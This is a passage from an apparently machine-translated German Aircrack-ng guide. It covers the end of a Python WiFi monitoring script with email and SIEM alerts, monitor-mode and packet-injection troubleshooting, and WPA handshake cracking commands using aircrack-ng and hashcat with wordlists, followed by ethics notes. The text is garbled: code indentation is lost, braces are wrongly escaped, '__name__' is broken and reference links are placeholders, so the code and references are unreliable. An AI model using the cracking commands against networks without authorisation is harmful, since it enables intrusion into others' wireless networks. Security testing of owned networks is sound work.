Network Details: BSSID: \\{alert['network']['bssid']\\} ESSID: \\{alert['network']['essid']\\} Channel: \\{alert['network']['channel']\\} Encryption: \\{alert['network']['privacy']\\} Power: \\{alert['network']['power']\\} dBm
This is an automated alert from the WiFi monitoring system. """
msg.attach(MimeText(body, 'plain'))
server = smtplib.SMTP(email_config['smtp_server'], email_config['port'])
if email_config.get('use_tls', True):
server.starttls()
if email_config.get('username'):
server.login(email_config['username'], email_config['password'])
server.send_message(msg)
server.quit()
except Exception as e:
self.logger.error(f"Failed to send email alert: \\\\{e\\\\}")
def send_siem_alert(self, alert):
"""Send alert to SIEM system"""
try:
import requests
siem_config = self.config['siem']
siem_event = \\\\{
'timestamp': datetime.now().isoformat(),
'source': 'wifi_monitor',
'event_type': alert['type'],
'severity': alert['severity'],
'message': alert['message'],
'network': alert['network']
\\\\}
response = requests.post(
siem_config['url'],
json=siem_event,
headers=\\\\{'Authorization': f"Bearer \\\\{siem_config['token']\\\\}"\\\\},
timeout=10
)
if response.status_code != 200:
self.logger.error(f"Failed to send SIEM alert: \\\\{response.status_code\\\\}")
except Exception as e:
self.logger.error(f"Error sending SIEM alert: \\\\{e\\\\}")
def run_continuous_monitoring(self):
"""Run continuous WiFi monitoring"""
self.logger.info("Starting continuous WiFi monitoring")
while True:
try:
self.logger.info("Scanning for wireless networks...")
networks = self.scan_networks()
if networks:
self.logger.info(f"Found \\\\{len(networks)\\\\} networks")
# Detect anomalies
alerts = self.detect_anomalies(networks)
# Send alerts
for alert in alerts:
self.send_alert(alert)
# Save scan results
with open('/var/log/wifi_scan_results.json', 'a') as f:
for network in networks:
f.write(json.dumps(network) + '\n')
else:
self.logger.info("No networks found")
# Wait for next scan
self.logger.info(f"Waiting \\\\{self.scan_interval\\\\} seconds for next scan...")
time.sleep(self.scan_interval)
except KeyboardInterrupt:
self.logger.info("Monitoring stopped by user")
break
except Exception as e:
self.logger.error(f"Error in monitoring loop: \\\\{e\\\\}")
time.sleep(60) # Wait before retrying
Configuration
config = \\{ 'interface': 'wlan0mon', 'scan_interval': 300, # 5 minutes 'email': \\{ 'enabled': True, 'smtp_server': 'smtp.company.com', 'port': 587, 'use_tls': True, 'username': 'monitor@company.com', 'password': 'password', 'from': 'wifi-monitor@company.com', 'to': 'security@company.com' \\}, 'siem': \\{ 'enabled': False, 'url': 'https://siem.company.com/api/events', 'token': 'your-api-token' \\} \\}
Usage
if name == "main": monitor = WiFiMonitor(config) monitor.run_continuous_monitoring() ```_
Fehlerbehebung
Gemeinsame Themen
Monitor Mode Issues: ```bash
Check if interface supports monitor mode
iw list|grep -A 10 "Supported interface modes"
Kill interfering processes
sudo airmon-ng check kill
Manually set monitor mode
sudo ip link set wlan0 down sudo iw dev wlan0 set type monitor sudo ip link set wlan0 up
Check monitor mode status
iwconfig wlan0 ```_
** Keine Netzwerke Entdeckt:** ```bash
Check interface status
iwconfig sudo iw dev
Verify monitor mode
iwconfig wlan0mon|grep Mode
Check for hardware issues
dmesg|grep -i wifi lsusb|grep -i wireless
Try different channels
sudo iwconfig wlan0mon channel 1 sudo iwconfig wlan0mon channel 6 sudo iwconfig wlan0mon channel 11 ```_
Injektionsfragen: ```bash
Test injection capability
sudo aireplay-ng --test wlan0mon
Check for packet injection support
sudo aireplay-ng --test wlan1mon
Verify driver support
lsmod|grep -i wireless dmesg|grep -i driver ```_
Leistungsoptimierung
Optimierung der Aircrack-ng Leistung:
```bash
Use multiple CPU cores for cracking
aircrack-ng -p 4 capture.cap
Optimize airodump-ng
sudo airodump-ng --band abg wlan0mon # Scan all bands sudo airodump-ng -M wlan0mon # Enable manufacturer lookup
Use faster wordlists
Create optimized wordlist
sort wordlist.txt|uniq > optimized_wordlist.txt
Use GPU acceleration with hashcat
aircrack-ng -J hashcat_format capture.cap hashcat -m 2500 -w 3 hashcat_format.hccapx wordlist.txt ```_
Sicherheitsüberlegungen
Ethische Nutzung
Rechtliche Erwägungen: - Nur Testnetzwerke, die Sie besitzen oder eine ausdrückliche Erlaubnis zum Testen haben - Lokale Gesetze zur drahtlosen Sicherheitsprüfung verstehen - ordnungsgemäße Genehmigung vor der Durchführung von Bewertungen erhalten - Dokumentation aller Prüftätigkeiten für die Erfüllung von Zwecken - Respektieren Sie Privatsphäre und Vertraulichkeit erfasster Daten
** Sicherheit:** - Verwenden Sie Aircrack-ng in isolierten Testumgebungen, wenn möglich - Implementierung richtiger Zugriffskontrollen für erfasste Daten - Sichere Speicherung und Übermittlung sensibler Informationen - Regelmäßige Aktualisierungen von Aircrack-ng und Abhängigkeiten - Monitor zur Erkennung durch drahtlose Intrusionserkennungssysteme
Datenschutz
** Erfassung der Datensicherheit:** - Verschlüsseln erfasste Handshakes und Verkehr - Implementieren Sie sichere Löschung von temporären Dateien - Verwenden Sie sichere Kanäle für die Datenübertragung - Umsetzung von Datenschutzbestimmungen - Regelmäßige Sicherheitsbewertungen der Prüfinfrastruktur
Referenzen
- [Amtsblatt](https://LINK_5
- (__LINK_5___)
- WiFi Security Testing Guide
- (LINK5)
- [IEEE 802.11 Standards](__LINK_5___